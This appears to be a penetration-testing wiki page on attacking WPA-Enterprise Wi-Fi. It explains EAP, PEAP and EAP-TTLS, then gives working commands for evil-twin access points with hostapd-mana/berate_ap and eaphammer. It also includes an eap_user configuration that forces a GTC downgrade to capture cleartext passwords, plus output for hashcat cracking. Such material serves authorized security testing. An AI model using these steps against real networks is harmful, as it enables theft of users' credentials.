WPA-Enterprise

WPA-Enterprise delegates the authentication to a RADIUS server. Even though it is not vulnerable to any direct attack, it is still possible to intercept credentials by performing an evil-twin attack against clients.

Theory

WPA-Enterprise, also refered to as WPA-EAP or WPA-802.1X, uses various kinds of the EAP authentication framework, which provides a transport mechanism for many other authentication methods such as:

These authentication methods allow the access point to delegate the authentication to a RADIUS server.

EAP.png

Certificate Authentication

All modern clients use EAP-TLS when needing to authenticate using a certificate. In fact, unlike most TLS implementations of HTTPS, the majority of implementations of EAP-TLS require client-side certificates without giving the option to disable this requirement.

EAP-TLS.png

Credentials Authentication

Most modern clients use PEAP or EAP-TTLS when needing to authenticate using a username and password. These protocols, similar in design, consist of two authentication layers:

PEAP_EAP-TTLS.png

Tip

Most clients will prefer to use MSCHAPv2 for the inner layer authentication protocol, which will require you to crack the captured challenge-response to recover the cleartext credentials. However, it is possible to capture cleartext credentials in the first place by performing a GTC downgrade attack, i.e. forcing the client to use the weaker authentication protocol GTC.

Evil-Twin Attack

This attack consists of creating a rogue access point mimicking the targeted ESSID in order to get clients to perform the inner authentication process with your rogue RADIUS server. Thus, allowing you to capture the credentials or challenge-response used during inner authentication.

This attack will not work against clients configured to:

hostapd-mana

Using hostapd-mana with berate_ap, it is possible to create an evil-twin access point configured to intercept various EAP credentials:

berate_ap -n <iface> <ESSID> --eap --mana-wpe --mana-credout [/path/to/output]

Source: github.com/sensepost/hostapd-mana, github.com/sensepost/berate_ap

This will automatically prompt you to fill-in the information required to create the rogue RADIUS certificate. Use the following additional options to fine-tune the evil-twin access point configuration:

Option Description
--mac [00:11:22:33:44:55] Access point BSSID
-c [channel] Access point channel (list of WLAN channels)
--freq-band [2.4/5] Set frequency band
--ieee80211ac Enable IEEE 802.11ac

See berate_ap -h and hostapd-mana wiki for more details.

Tip

To perform a GTC downgrade attack, use the option --eap-user-file /path/to/eap_user with the following configuration file:

# Phase 1 users
*   PEAP,TTLS,TLS,FAST

# Phase 2 users
"t"   GTC,TTLS-PAP,MD5,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,TTLS-MSCHAPV2,TTLS  "t"   [2]

The collected credentials can be found in the file specified by the --mana-credout option:

wpa-eap-hostapd-mana.png

eaphammer

Warning

This tool needs to be run from its installation directory, i.e. ./eaphammer.

First, generate a fake certificate for the rogue RADIUS server:

./eaphammer --cert-wizard

Then, start the evil-twin access point with the name of the targeted ESSID:

./eaphammer -i <iface> -e <ESSID> --creds

Use the following additional options to fine-tune the evil-twin access point configuration:

Option Description
-b [00:11:22:33:44:55] Access point BSSID
--hw-mode [g/a] Hardware mode: g for 2.4 Ghz, a for 5 Ghz
-c [channel] Access point channel (list of WLAN channels)

Tip

The GTC downgrade attack is performed automatically by eaphammer.

When a client tries to authenticate to your rogue access point, eaphammer should display the captured MSCHAPv2 challenge-response in hashcat -m 5500 format. wpa-eap-eaphammer.png

References